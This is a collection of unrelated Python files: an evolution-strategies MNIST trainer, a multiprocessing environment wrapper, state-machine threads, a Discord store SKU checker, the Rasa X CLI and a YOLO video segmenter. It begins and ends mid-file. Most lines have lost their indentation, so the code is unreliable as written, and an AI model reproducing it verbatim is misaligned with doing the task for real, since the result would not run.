te_net = slim.fully_connected(te_net, 10, activation_fn=None, reuse=reuse, scope='layer2')
return te_net
def reward(te_inference, tp_labels):
"""
Reward for the current inference, negative of the traditional loss
:te_inference: expression for logits
:tp_labels: placeholder for true labels
:return: reward expression
"""
return -tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=tp_labels, logits=te_inference))
def accuracy(te_inference, tp_labels):
"""
Construct accuracy expression
:te_inference: expression for logits
:tp_labels: true label placeholder
:return: accuracy expression
"""
te_correct_prediction = tf.equal(tf.argmax(te_inference, 1), tf.argmax(tp_labels, 1))
return tf.reduce_mean(tf.cast(te_correct_prediction, tf.float32))
def placeholders():
"""
Creates placeholders for inputs and labels
"""
tp_input = tf.placeholder(tf.float32, shape=[None, INPUT_DIMENSIONS[0] * INPUT_DIMENSIONS[1]])
tp_label = tf.placeholder(tf.float32, shape=[None, 10])
return tp_input, tp_label
def iterate_minibatches(input_set, target_set, batch_size, shuffle=False):
"""
Generator to yield minibatches for a training set
:input_set: input feature set
:target_set: target labels for the features
:batch_size: batch size for minibatch
:shuffle: shuffle the data
"""
if shuffle:
indices = np.arange(len(input_set))
np.random.shuffle(indices)
for start_idx in range(0, len(input_set) - batch_size + 1, batch_size):
if shuffle:
excerpt = indices[start_idx:start_idx + batch_size]
else:
excerpt = slice(start_idx, start_idx + batch_size)
yield input_set[excerpt], target_set[excerpt]
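# Example: iterate over a training set in shuffled batches of 200
#   for x_batch, y_batch in iterate_minibatches(X, y, 200, shuffle=True):
#       ...  # X and y here are placeholder names for features/labels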
def train(n_epochs, population_size=50, learning_rate=0.001, sigma=0.01, n_workers=4, resume=False):
"""
    Train using the ES algorithm; parallelizes on a single CPU across multiple threads
:n_epochs: number of training epochs
:population_size: size of population used in ES
:learning_rate: ES hyperparameter
:sigma: ES hyperparameter
:n_workers: number of parallel threads
"""
# load the dataset
dataset = input_data.read_data_sets('./data/', one_hot=True)
# uncomment to use a smaller set
train_images = dataset.train.images # [:600]
train_labels = dataset.train.labels # [:600]
# validation data
validate_images = dataset.validation.images
    validate_labels = dataset.validation.labels
def fitness_shaping(rewards):
"""
A rank transformation on the rewards, which reduces the chances
of falling into local optima early in training.
Borrowed from https://github.com/atgambardella/pytorch-es/blob/master/train.py#L86
"""
sorted_rewards_backwards = sorted(rewards)[::-1]
lamb = len(rewards)
shaped_rewards = []
denom = sum(
[max(0, math.log(lamb / 2 + 1, 2) - math.log(sorted_rewards_backwards.index(r) + 1, 2)) for r in rewards])
for r in rewards:
num = max(0, math.log(lamb / 2 + 1, 2) - math.log(sorted_rewards_backwards.index(r) + 1, 2))
shaped_rewards.append(num / denom + 1 / lamb)
return shaped_rewards
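    # Worked example of the shaping (approximate values): fitness_shaping(
    # [0.1, 0.5, 0.3]) returns roughly [0.33, 1.14, 0.53] -- rank decides the
    # weight, so the best reward gets the largest share and the worst only
    # receives the 1/lambda floor.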
def create_feed_dict(x, t, params):
"""
Utility method to create a feed dictionary
"""
f_dict = {tp_input: x, tp_labels: t}
for te_l_p, param in zip(te_layer_params, params):
f_dict[te_l_p] = param
return f_dict
def worker(i, perturbed_params, rewards):
"""
Runs the whole dataset with given params and return the reward with these params
"""
for batch in iterate_minibatches(train_images, train_labels, BATCH_SIZE, shuffle=True):
rewards[i] += sess.run(te_reward, feed_dict=create_feed_dict(batch[0], batch[1], perturbed_params))
with tf.Graph().as_default():
# create network and reward/accuracy expressions
tp_input, tp_labels = placeholders()
te_inference = inference_2_layer_mlp(tp_input)
te_reward = reward(te_inference, tp_labels)
te_accuracy = accuracy(te_inference, tp_labels)
# create session
init = tf.global_variables_initializer()
config = tf.ConfigProto(
device_count={'GPU': 0}
)
sess = tf.Session(config=config)
sess.run(init)
# logging
duration = 0
print('-' * 86)
print('%-10s | %-20s | %-20s | %-10s' % ('Step', 'Reward', 'Accuracy', 'Time(s)'))
print('-' * 86)
summary_writer = tf.summary.FileWriter('./summaries_es', sess.graph)
saver = tf.train.Saver()
# create initial param vector
te_layer_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='mnist_es')
params = []
if resume:
params = np.load("./saved_models/mnist_es_params.npy")
else:
for te_p in te_layer_params:
params.append(sess.run(te_p))
# train for specified number of epochs
for epoch in range(n_epochs):
start_time = time.time()
# arrays for saving seeds, parameters and rewards
seeds = []
perturbed_params = []
rewards = [0] * population_size
for _ in range(int(population_size / 2)):
# save the seeds and params - the perturbations are in pairs, + and -
np.random.seed()
seeds.append(np.random.randint(2 ** 30))
seeds.append(seeds[-1])
perturbed_params.append([])
perturbed_params.append([])
np.random.seed(seeds[-1])
                # perturbations are zero-mean normal samples; draw ONE sample
                # per param and use +/- of the same sample, so each pair is
                # truly mirrored and the update step below can re-generate
                # identical noise from the stored seed
                for param in params:
                    noise = np.random.normal(0, 1, param.shape)
                    perturbed_params[-2].append(param + sigma * noise)
                    perturbed_params[-1].append(param - sigma * noise)
# evaluate each perturbation to get the rewards
for worker_batch_idx in range(int(population_size / n_workers)):
processes = []
for worker_idx in range(n_workers):
i = worker_batch_idx * n_workers + worker_idx
p = threading.Thread(target=worker, args=(i, perturbed_params[i], rewards))
p.start()
processes.append(p)
for p in processes:
p.join()
# logging
val_reward = np.mean(rewards)
summary_writer.add_summary(tf.Summary(value=[
tf.Summary.Value(tag="reward", simple_value=val_reward),
]), epoch)
# fitness shaping
shaped_rewards = fitness_shaping(rewards)
# parameter update based on rewards
sign = 1
for pop_idx in range(int(population_size)):
np.random.seed(seeds[pop_idx])
for i in range(len(params)):
params[i] = params[i] + sign * learning_rate / (population_size * sigma) * shaped_rewards[
pop_idx] * np.random.normal(0, 1, params[i].shape)
sign *= -1
duration += (time.time() - start_time)
# logging
if epoch % LOG_FREQUENCY == 0:
# for batch in iterate_minibatches(train_images, train_labels, BATCH_SIZE, shuffle=True):
# val_acc = sess.run(te_accuracy, feed_dict=create_feed_dict(batch[0], batch[1], params))
# print('%-10s | %-20s | %-20s | %-10s' % (
# '%d' % epoch, '%.5f' % val_reward, '%.5f' % val_acc, '%.2f' % duration))
# summary_writer.add_summary(tf.Summary(value=[
# tf.Summary.Value(tag="accuracy", simple_value=val_acc),
# ]), epoch)
# break
val_acc = 0.0
for i in range(0, len(validate_images), BATCH_SIZE):
val_acc += sess.run(te_accuracy, feed_dict=create_feed_dict(validate_images[i:i + BATCH_SIZE],
                                                                            validate_labels[i:i + BATCH_SIZE],
params))
val_acc = val_acc * BATCH_SIZE / len(validate_images)
print('%-10s | %-20s | %-20s | %-10s' %
('%d' % epoch, '%.5f' % val_reward, '%.5f' % val_acc, '%.2f' % duration))
summary_writer.add_summary(tf.Summary(value=[tf.Summary.Value(tag="accuracy", simple_value=val_acc), ]),
epoch)
duration = 0
# evaluate Final Test Accuracy
mnist_test_images = dataset.test.images
mnist_test_labels = dataset.test.labels
np.save("./saved_models/mnist_es_params.npy", np.array(params))
overall_acc = 0.0
for i in range(0, len(mnist_test_images), BATCH_SIZE):
overall_acc += sess.run(te_accuracy, feed_dict=create_feed_dict(mnist_test_images[i:i + BATCH_SIZE],
mnist_test_labels[i:i + BATCH_SIZE],
params))
print('\nFinal test accuracy: %g' % (overall_acc * BATCH_SIZE / len(mnist_test_images)))
if __name__ == '__main__':
train(EPOCHS, population_size=POP_SIZE, n_workers=NUM_WORKERS, resume=False)
|
subproc_vec_env.py
|
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns):
"""
envs: list of gym environments to run in subprocesses
"""
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [
Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)
]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
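# Minimal usage sketch (illustrative only; assumes gym is installed):
#   import gym
#   venv = SubprocVecEnv([lambda: gym.make('CartPole-v1') for _ in range(4)])
#   obs = venv.reset()                            # stacked array, one row per env
#   actions = [venv.action_space.sample() for _ in range(4)]
#   obs, rews, dones, infos = venv.step(actions)  # VecEnv.step = step_async + step_wait
#   venv.close()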
|
threads.py
|
from transitions.extensions import LockedMachine as Machine
from threading import Thread
import sys
import time
states_A = ['A', 'B', 'C']
machine = Machine(states=states_A, initial='A')
states_B = ['M','N','O']
machineB = Machine(states = states_B, initial = 'M')
def func_states_A():
while(1):
ctrl = input("Insert a letter for fsm A: \n")
if (ctrl == '1'):
machine.to_A()
elif (ctrl == '2'):
machine.to_B()
elif (ctrl == '3'):
machine.to_C()
print(machine.state)
def func_states_B():
while(1):
ctrl = input("Insert a letter for fsm B: \n")
if (ctrl == 'a'):
machineB.to_M()
        elif (ctrl == 's'):
            machineB.to_N()  # fixed: was to_M(), which left state N unreachable
elif (ctrl == 'd'):
machineB.to_O()
print(machineB.state)
thread_A = Thread(target=func_states_A)
thread_A.start()
thread_B = Thread(target = func_states_B)
thread_B.start()
thread_A.join()
thread_B.join()
|
main.py
|
from threading import Thread, Event
from queue import Queue
from tkinter import Tk, ttk
from time import sleep as wait
from loggingFramework import Logger
import requests
import json
import sys
logger = Logger()
def handle_exception(etype, value, traceback):
logger.logException(value)
quit()
sys.excepthook = handle_exception
skuKey = "primary_sku_id"
logger.logInfo("Getting games list")
datajson = requests.get("https://discordapp.com/api/v6/applications/detectable").json()
logger.logInfo("Building Interface")
root = Tk()
root.title("Search Discord for games!")
root.geometry('400x250+1000+300')
lb0 = ttk.Label(root, text="{} games to check. Estimated time: {} minutes".format(len(datajson), round((len(datajson) * 1) / 60, 2)))
lb0.pack()
lb1 = ttk.Label(root, text="Checked {} out of {} games".format("0", len(datajson)))
lb1.pack()
lb2 = ttk.Label(root, text="Press Start to begin searching")
lb2.pack()
pb = ttk.Progressbar(root, maximum=len(datajson), mode="determinate")
pb.pack(expand=True)
info_queue = Queue()
info_event = Event()
term_event = Event()
s_term_event = Event()
def start():
logger.logInfo("Starting...")
global updateThread
global searchT
s_term_event.clear()
btn["state"] = "disabled"
root.title("Searching Discord for games...")
updateThread = Thread(target=updateGUI, args=(info_queue, info_event, term_event))
searchT = Thread(target=search, args=(info_queue, info_event, term_event, s_term_event))
updateThread.start()
wait(0.1)
searchT.start()
def cancelSearch():
btn["state"] = "normal"
root.title("Searching Discord for games... Cancelled")
s_term_event.set()
def updateGUI(in_queue, in_event, term_event_in):
logger.logInfo("[Update]: Starting...", True)
while True:
is_set = in_event.wait(10)
if is_set:
try:
lb0text = in_queue.get()
lb1text = in_queue.get()
lb2text = in_queue.get()
pbvalue = in_queue.get()
lb0.config(text = lb0text)
lb1.config(text = lb1text)
lb2.config(text = lb2text)
pb["value"] = pbvalue
in_event.clear()
except Exception as e:
logger.logException(e)
s_term_event.set()
term_event_in.set()
        if term_event_in.is_set():
logger.logInfo("[Update]: Terminating...", True)
return
def search(queue_out, event_out, term_event_out, term_event_in):
logger.logInfo("[Search]: Starting...", True)
maxItems = len(datajson)
cItem = 1
workingSKUS = []
SKUCount = 0
queue_out.put("Checked {} out of {} games".format("0", len(datajson)))
queue_out.put("Starting")
queue_out.put("Please wait...")
queue_out.put(0)
event_out.set()
#root.update()
wait(2)
for item in datajson:
try:
while True:
r = requests.get("https://discordapp.com/api/v6/store/published-listings/skus/{}".format(item[skuKey]))
if r.status_code == 404:
break
elif r.status_code == 200:
workingSKUS.append(item)
break
elif r.status_code == 429:
wait(10)
continue
else:
break
SKUCount += 1
except KeyError:
pass
except Exception as e:
logger.logException(e)
cItem += 1
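        # Busy-wait until the GUI thread has consumed the previous batch of
        # messages; the spin loop is simple but burns CPU (a Queue.join() /
        # task_done() pairing would be the non-spinning alternative).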
while not queue_out.empty():
pass
queue_out.put("Checked {} out of {} games".format(cItem - 1, len(datajson)))
queue_out.put("Checking {}".format(item["name"]))
queue_out.put("{} SKU IDs have been checked and I've found {} working SKUs so far".format(SKUCount, len(workingSKUS)))
queue_out.put(cItem - 1)
event_out.set()
wait(1)
if term_event_in.is_set():
logger.logInfo("[Search]: Terminating...", True)
term_event_out.set()
return
listString = []
for item in workingSKUS:
listString.append("{} : https://discord.com/store/skus/{}".format(item["name"], item[skuKey]))
logger.logInfo("Writing to file...")
with open("output.txt", "w") as outputfile:
outputfile.write("\n".join(listString))
queue_out.put(lb0["text"])
queue_out.put("Completed! Please check the new output.txt file")
queue_out.put("Found {} working SKUs".format(len(workingSKUS)))
queue_out.put(pb["value"])
event_out.set()
term_event_out.set()
btn = ttk.Button(root, text="Start", command=start)
btn.pack()
cbtn = ttk.Button(root, text="Cancel", command=cancelSearch)
cbtn["state"] = "disabled"
cbtn.pack()
logger.logInfo("Interface built, starting main loop!")
root.mainloop()
|
x.py
|
import argparse
import asyncio
import importlib.util
import logging
from multiprocessing import get_context
import os
import signal
import sys
import traceback
from typing import Iterable, List, Optional, Text, Tuple
import aiohttp
import ruamel.yaml as yaml
from rasa.cli import SubParsersAction
from rasa.cli.arguments import x as arguments
import rasa.cli.utils
from rasa.constants import (
DEFAULT_LOG_LEVEL_RASA_X,
DEFAULT_RASA_PORT,
DEFAULT_RASA_X_PORT,
)
from rasa.shared.constants import (
DEFAULT_CONFIG_PATH,
DEFAULT_CREDENTIALS_PATH,
DEFAULT_DOMAIN_PATH,
DEFAULT_ENDPOINTS_PATH,
DOCS_BASE_URL_RASA_X,
)
from rasa.core.utils import AvailableEndpoints
from rasa.shared.exceptions import RasaXTermsError
import rasa.shared.utils.cli
import rasa.shared.utils.io
import rasa.utils.common
from rasa.utils.endpoints import EndpointConfig
import rasa.utils.io
logger = logging.getLogger(__name__)
DEFAULT_EVENTS_DB = "events.db"
def add_subparser(
subparsers: SubParsersAction, parents: List[argparse.ArgumentParser]
) -> None:
"""Add all rasa x parsers.
Args:
subparsers: subparser we are going to attach to
parents: Parent parsers, needed to ensure tree structure in argparse
"""
x_parser_args = {
"parents": parents,
"conflict_handler": "resolve",
"formatter_class": argparse.ArgumentDefaultsHelpFormatter,
}
if is_rasa_x_installed():
# we'll only show the help msg for the command if Rasa X is actually installed
x_parser_args["help"] = "Starts the Rasa X interface."
shell_parser = subparsers.add_parser("x", **x_parser_args)
shell_parser.set_defaults(func=rasa_x)
arguments.set_x_arguments(shell_parser)
def _rasa_service(
args: argparse.Namespace,
endpoints: AvailableEndpoints,
rasa_x_url: Optional[Text] = None,
credentials_path: Optional[Text] = None,
):
"""Starts the Rasa application."""
from rasa.core.run import serve_application
# needs separate logging configuration as it is started in its own process
rasa.utils.common.set_log_level(args.loglevel)
rasa.utils.io.configure_colored_logging(args.loglevel)
if not credentials_path:
credentials_path = _prepare_credentials_for_rasa_x(
args.credentials, rasa_x_url=rasa_x_url
)
serve_application(
endpoints=endpoints,
port=args.port,
credentials=credentials_path,
cors=args.cors,
auth_token=args.auth_token,
enable_api=True,
jwt_secret=args.jwt_secret,
jwt_method=args.jwt_method,
ssl_certificate=args.ssl_certificate,
ssl_keyfile=args.ssl_keyfile,
ssl_ca_file=args.ssl_ca_file,
ssl_password=args.ssl_password,
)
def _prepare_credentials_for_rasa_x(
credentials_path: Optional[Text], rasa_x_url: Optional[Text] = None
) -> Text:
credentials_path = rasa.cli.utils.get_validated_path(
credentials_path, "credentials", DEFAULT_CREDENTIALS_PATH, True
)
if credentials_path:
credentials = rasa.shared.utils.io.read_config_file(credentials_path)
else:
credentials = {}
    # this makes sure Rasa X is properly configured no matter what
if rasa_x_url:
credentials["rasa"] = {"url": rasa_x_url}
dumped_credentials = yaml.dump(credentials, default_flow_style=False)
tmp_credentials = rasa.utils.io.create_temporary_file(dumped_credentials, "yml")
return tmp_credentials
def _overwrite_endpoints_for_local_x(
endpoints: AvailableEndpoints, rasa_x_token: Text, rasa_x_url: Text
):
endpoints.model = _get_model_endpoint(endpoints.model, rasa_x_token, rasa_x_url)
endpoints.event_broker = _get_event_broker_endpoint(endpoints.event_broker)
def _get_model_endpoint(
model_endpoint: Optional[EndpointConfig], rasa_x_token: Text, rasa_x_url: Text
) -> EndpointConfig:
# If you change that, please run a test with Rasa X and speak to the bot
default_rasax_model_server_url = (
f"{rasa_x_url}/projects/default/models/tags/production"
)
model_endpoint = model_endpoint or EndpointConfig()
# Checking if endpoint.yml has existing url, if so give
# warning we are overwriting the endpoint.yml file.
custom_url = model_endpoint.url
if custom_url and custom_url != default_rasax_model_server_url:
logger.info(
f"Ignoring url '{custom_url}' from 'endpoints.yml' and using "
f"'{default_rasax_model_server_url}' instead."
)
custom_wait_time_pulls = model_endpoint.kwargs.get("wait_time_between_pulls")
return EndpointConfig(
default_rasax_model_server_url,
token=rasa_x_token,
wait_time_between_pulls=custom_wait_time_pulls or 2,
)
def _get_event_broker_endpoint(
event_broker_endpoint: Optional[EndpointConfig],
) -> EndpointConfig:
import questionary
default_event_broker_endpoint = EndpointConfig(
type="sql", dialect="sqlite", db=DEFAULT_EVENTS_DB
)
if not event_broker_endpoint:
return default_event_broker_endpoint
elif not _is_correct_event_broker(event_broker_endpoint):
rasa.shared.utils.cli.print_error(
f"Rasa X currently only supports a SQLite event broker with path "
f"'{DEFAULT_EVENTS_DB}' when running locally. You can deploy Rasa X "
f"with Docker ({DOCS_BASE_URL_RASA_X}/installation-and-setup/"
f"docker-compose-quick-install/) if you want to use other event broker "
f"configurations."
)
continue_with_default_event_broker = questionary.confirm(
"Do you want to continue with the default SQLite event broker?"
).ask()
if not continue_with_default_event_broker:
sys.exit(0)
return default_event_broker_endpoint
else:
return event_broker_endpoint
def _is_correct_event_broker(event_broker: EndpointConfig) -> bool:
return all(
[
event_broker.type == "sql",
event_broker.kwargs.get("dialect", "").lower() == "sqlite",
event_broker.kwargs.get("db") == DEFAULT_EVENTS_DB,
]
)
def start_rasa_for_local_rasa_x(args: argparse.Namespace, rasa_x_token: Text):
"""Starts the Rasa X API with Rasa as a background process."""
credentials_path, endpoints_path = _get_credentials_and_endpoints_paths(args)
endpoints = AvailableEndpoints.read_endpoints(endpoints_path)
rasa_x_url = f"http://localhost:{args.rasa_x_port}/api"
_overwrite_endpoints_for_local_x(endpoints, rasa_x_token, rasa_x_url)
vars(args).update(
dict(
nlu_model=None,
cors="*",
auth_token=args.auth_token,
enable_api=True,
endpoints=endpoints,
)
)
ctx = get_context("spawn")
p = ctx.Process(
target=_rasa_service, args=(args, endpoints, rasa_x_url, credentials_path)
)
p.daemon = True
p.start()
return p
def is_rasa_x_installed() -> bool:
"""Check if Rasa X is installed."""
# we could also do something like checking if `import rasax` works,
# the issue with that is that it actually does import the package and this
# takes some time that we don't want to spend when booting the CLI
return importlib.util.find_spec("rasax") is not None
def generate_rasa_x_token(length: int = 16):
"""Generate a hexadecimal secret token used to access the Rasa X API.
A new token is generated on every `rasa x` command.
"""
from secrets import token_hex
return token_hex(length)
def _configure_logging(args: argparse.Namespace):
from rasa.core.utils import configure_file_logging
from rasa.utils.common import set_log_level
log_level = args.loglevel or DEFAULT_LOG_LEVEL_RASA_X
if isinstance(log_level, str):
log_level = logging.getLevelName(log_level)
logging.basicConfig(level=log_level)
rasa.utils.io.configure_colored_logging(args.loglevel)
set_log_level(log_level)
configure_file_logging(logging.root, args.log_file)
logging.getLogger("werkzeug").setLevel(logging.WARNING)
logging.getLogger("engineio").setLevel(logging.WARNING)
logging.getLogger("pika").setLevel(logging.WARNING)
logging.getLogger("socketio").setLevel(logging.ERROR)
if not log_level == logging.DEBUG:
logging.getLogger().setLevel(logging.WARNING)
logging.getLogger("py.warnings").setLevel(logging.ERROR)
def is_rasa_project_setup(args: argparse.Namespace, project_path: Text) -> bool:
config_path = _get_config_path(args)
mandatory_files = [config_path, DEFAULT_DOMAIN_PATH]
for f in mandatory_files:
if not os.path.exists(os.path.join(project_path, f)):
return False
return True
def _validate_rasa_x_start(args: argparse.Namespace, project_path: Text):
if not is_rasa_x_installed():
rasa.shared.utils.cli.print_error_and_exit(
"Rasa X is not installed. The `rasa x` "
"command requires an installation of Rasa X. "
"Instructions on how to install Rasa X can be found here: "
"https://rasa.com/docs/rasa-x/."
)
if args.port == args.rasa_x_port:
rasa.shared.utils.cli.print_error_and_exit(
"The port for Rasa X '{}' and the port of the Rasa server '{}' are the "
"same. We need two different ports, one to run Rasa X (e.g. delivering the "
"UI) and another one to run a normal Rasa server.\nPlease specify two "
"different ports using the arguments '--port' and '--rasa-x-port'.".format(
args.rasa_x_port, args.port
)
)
if not is_rasa_project_setup(args, project_path):
rasa.shared.utils.cli.print_error_and_exit(
"This directory is not a valid Rasa project. Use 'rasa init' "
"to create a new Rasa project or switch to a valid Rasa project "
"directory (see http://rasa.com/docs/rasa/user-guide/"
"rasa-tutorial/#create-a-new-project)."
)
_validate_domain(os.path.join(project_path, DEFAULT_DOMAIN_PATH))
if args.data and not os.path.exists(args.data):
rasa.shared.utils.cli.print_warning(
"The provided data path ('{}') does not exists. Rasa X will start "
"without any training data.".format(args.data)
)
def _validate_domain(domain_path: Text):
from rasa.shared.core.domain import Domain, InvalidDomain
try:
Domain.load(domain_path)
except InvalidDomain as e:
rasa.shared.utils.cli.print_error_and_exit(
"The provided domain file could not be loaded. " "Error: {}".format(e)
)
def rasa_x(args: argparse.Namespace):
from rasa.cli.utils import signal_handler
signal.signal(signal.SIGINT, signal_handler)
_configure_logging(args)
if args.production:
run_in_production(args)
else:
run_locally(args)
async def _pull_runtime_config_from_server(
config_endpoint: Optional[Text],
attempts: int = 60,
wait_time_between_pulls: float = 5,
keys: Iterable[Text] = ("endpoints", "credentials"),
) -> Optional[List[Text]]:
"""Pull runtime config from `config_endpoint`.
Returns a list of paths to yaml dumps, each containing the contents of one of
`keys`.
"""
while attempts:
try:
async with aiohttp.ClientSession() as session:
async with session.get(config_endpoint) as resp:
if resp.status == 200:
rjs = await resp.json()
try:
return [
rasa.utils.io.create_temporary_file(rjs[k])
for k in keys
]
except KeyError as e:
rasa.shared.utils.cli.print_error_and_exit(
"Failed to find key '{}' in runtime config. "
"Exiting.".format(e)
)
else:
logger.debug(
"Failed to get a proper response from remote "
"server. Status Code: {}. Response: '{}'"
"".format(resp.status, await resp.text())
)
except aiohttp.ClientError as e:
logger.debug(f"Failed to connect to server. Retrying. {e}")
await asyncio.sleep(wait_time_between_pulls)
attempts -= 1
rasa.shared.utils.cli.print_error_and_exit(
"Could not fetch runtime config from server at '{}'. "
"Exiting.".format(config_endpoint)
)
def run_in_production(args: argparse.Namespace):
from rasa.shared.utils.cli import print_success
print_success("Starting Rasa X in production mode... 🚀")
credentials_path, endpoints_path = _get_credentials_and_endpoints_paths(args)
endpoints = AvailableEndpoints.read_endpoints(endpoints_path)
_rasa_service(args, endpoints, None, credentials_path)
def _get_config_path(args: argparse.Namespace,) -> Optional[Text]:
config_path = rasa.cli.utils.get_validated_path(
args.config, "config", DEFAULT_CONFIG_PATH
)
return config_path
def _get_credentials_and_endpoints_paths(
args: argparse.Namespace,
) -> Tuple[Optional[Text], Optional[Text]]:
config_endpoint = args.config_endpoint
if config_endpoint:
endpoints_config_path, credentials_path = rasa.utils.common.run_in_loop(
_pull_runtime_config_from_server(config_endpoint)
)
else:
endpoints_config_path = rasa.cli.utils.get_validated_path(
args.endpoints, "endpoints", DEFAULT_ENDPOINTS_PATH, True
)
credentials_path = None
return credentials_path, endpoints_config_path
def run_locally(args: argparse.Namespace):
# noinspection PyUnresolvedReferences
from rasax.community import local # pytype: disable=import-error
args.rasa_x_port = args.rasa_x_port or DEFAULT_RASA_X_PORT
args.port = args.port or DEFAULT_RASA_PORT
project_path = "."
_validate_rasa_x_start(args, project_path)
rasa_x_token = generate_rasa_x_token()
process = start_rasa_for_local_rasa_x(args, rasa_x_token=rasa_x_token)
config_path = _get_config_path(args)
# noinspection PyBroadException
try:
local.main(
args, project_path, args.data, token=rasa_x_token, config_path=config_path
)
except RasaXTermsError:
# User didn't accept the Rasa X terms.
pass
except Exception:
print(traceback.format_exc())
rasa.shared.utils.cli.print_error(
"Sorry, something went wrong (see error above). Make sure to start "
"Rasa X with valid data and valid domain and config files. Please, "
"also check any warnings that popped up.\nIf you need help fixing "
"the issue visit our forum: https://forum.rasa.com/."
)
finally:
process.terminate()
|
shots_segmentation_client_RPi.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 5 12:03:29 2018
@author: imlab
"""
print ('Processing...')
import cv2
import threading
from threading import Thread
from yolo_main import tinu
import time
import os
s_time = time.time()
def video0():
print ('Processing Video')
#capture = cv2.VideoCapture('15 fps Office/office-0_15fps.avi')
#################
capture = cv2.VideoCapture('Road_6FPS/0410_1_6fps.avi')
#################
total_frames = int(capture.get(cv2.CAP_PROP_FRAME_COUNT))
# fpss = capture.get(cv2.CAP_PROP_FPS)
status_i , frame_i = capture.read()
i = 1
counter = 0
vehicles = 0
persons = 0
sending_flag = 0
shots_counter = 0
shot_number = 0
frames_count = 10
while(i < total_frames - 1):
sending_flag = sending_flag + 1
if sending_flag >= 3:
sending_flag = 0
image, confidences, class_ids = tinu(frame_i)
#print ('**',confidences)
#cv2.imshow('Frame',image)
            if len(confidences) != 0:
if any([x > 0.7 for x in confidences]):
cycle = class_ids.count(1)
car = class_ids.count(2)
bike = class_ids.count(3)
bus = class_ids.count(5)
train = class_ids.count(6)
truck = class_ids.count(7)
vehicles = cycle + car + bike + bus + train + truck
persons = class_ids.count(0)
#print ('persons = ' , persons, 'vehicles = ', vehicles)
#print ('**',confidences,'##')
if (vehicles >= 4 and persons >= 2) or (vehicles >= 3 and persons >= 3) or (vehicles >= 5) or (persons >= 5):
frames_count = frames_count + 1
if frames_count >= 10:
frames_count = 0
shot_number = shot_number + 1
shots_path = 'Master-RPi/' + str(shot_number)
                            if not os.path.exists(shots_path):
                                os.mkdir(shots_path)
###############
path = 'Master-RPi/' + str(shot_number) + '/frame_' + str(i) + '_v1.png'
###############
cv2.imwrite(path,frame_i)
print ('Frame written at: ', path)
#cv2.imshow('f',image)
#cv2.waitKey(30)
vehicles = 0
persons = 0
status_i , frame_i = capture.read()
#copy = frame_i
k = cv2.waitKey(30) & 0xff
i = i + 1
if k == 27:
break
print ('Processing Video 0 done')
video0()
#
#threads = 16 # Number of processes to create
#jobs = []
#
#thread0 = threading.Thread(target=video0)
#jobs.append(thread0)
#
#thread1 = threading.Thread(target=video1)
#jobs.append(thread1)
#
#thread2 = threading.Thread(target=video2)
#jobs.append(thread2)
#thread3 = threading.Thread(target=video3)
#jobs.append(thread3)
#
#
#for j in jobs:
# j.start()
#
#for j in jobs:
#
# j.join()
#
e_time = time.time()
total_time = e_time - s_time
print ('total time = ', total_time)
|
PyGLM vs NumPy.py
|
from threading import Thread
import time, math
glm_counter = 0
numpy_counter = 0
glm_time = 0
numpy_time = 0
test_duration = 1
display_update_delay = 1 / 10
results = []
def measure_function_glm(func, *args, **kw):
global glm_counter
glm_counter = 0
start = time.time()
last_print = 0
while True:
func(*args, **kw)
glm_counter += 1
now = time.time()
if now >= start + test_duration:
break
if now - last_print > display_update_delay:
last_print = now
print("\rPyGLM: {: 9d}x".format(glm_counter), end="")
print("\rPyGLM: {: 9d}x".format(glm_counter))
def measure_function_numpy(func, *args, **kw):
global numpy_counter
numpy_counter = 0
start = time.time()
last_print = 0
while True:
func(*args, **kw)
numpy_counter += 1
now = time.time()
if now >= start + test_duration:
break
if now - last_print > display_update_delay:
last_print = now
print("\rNumPy: {: 9d}x".format(numpy_counter), end="")
print("\rNumPy: {: 9d}x".format(numpy_counter))
"""
def print_percentage():
global glm_counter, numpy_counter
start = time.time()
last_print = 0
    while glm_counter < repetitions or numpy_counter < repetitions:
        print("\rPyGLM: {: 4d}%, NumPy: {: 4d}%".format(int(glm_counter / repetitions * 100), int(numpy_counter / repetitions * 100)), end="")
    print("\rPyGLM: {: 4d}%, NumPy: {: 4d}%".format(int(glm_counter / repetitions * 100), int(numpy_counter / repetitions * 100)))
"""
def arg_to_string(arg):
if isinstance(arg, type):
return "{}.{}".format(arg.__module__, arg.__name__)
return repr(arg)
def get_evaluation_string(glm_counter, numpy_counter):
if (glm_counter > numpy_counter):
return "PyGLM was {:.2f}x as fast as NumPy".format(glm_counter / numpy_counter)
else:
return "NumPy was {:.2f}x as fast as PyGLM".format(numpy_counter / glm_counter)
def test_func(description, glm_func, glm_args, numpy_func, numpy_args):
print("-"*80)
print("Comparing {}.\n".format(description))
